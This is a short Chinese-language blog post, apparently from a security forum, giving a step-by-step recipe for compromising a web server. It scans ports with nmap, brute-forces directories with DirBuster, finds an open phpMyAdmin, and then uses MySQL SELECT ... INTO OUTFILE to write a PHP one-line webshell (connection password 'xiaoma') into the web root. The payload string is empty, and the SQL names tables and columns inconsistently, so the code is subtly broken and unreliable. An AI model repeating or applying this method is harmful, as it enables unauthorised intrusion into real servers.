标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-2340] 作者: 如一 发表于: [2019-03-29] [2019-03-29]被用户:如一 修改过
本文共 [309] 位读者顶过
1、nmap扫端口(查看80端口是否开了):nmap -sV ***.***.***.***2、浏览器地址栏输入:http:\***.***.***.***访问目标网站。3、命令dirbuster打开OWASP DirBuster软件对目标网站扫描.4、在Target URL处输入http://***.***.***.***,在File with list of dirs./file出选择字典文件.单击start开始扫描.
5、扫描结果显示包含cgi-bin目录\phpmyadmin目录等.
6、在浏览器中打开http://***.***.***.***/phpmyadmin.可以直接看到数据库。
方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES (''); SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php 一句话连接密码:xiaoma |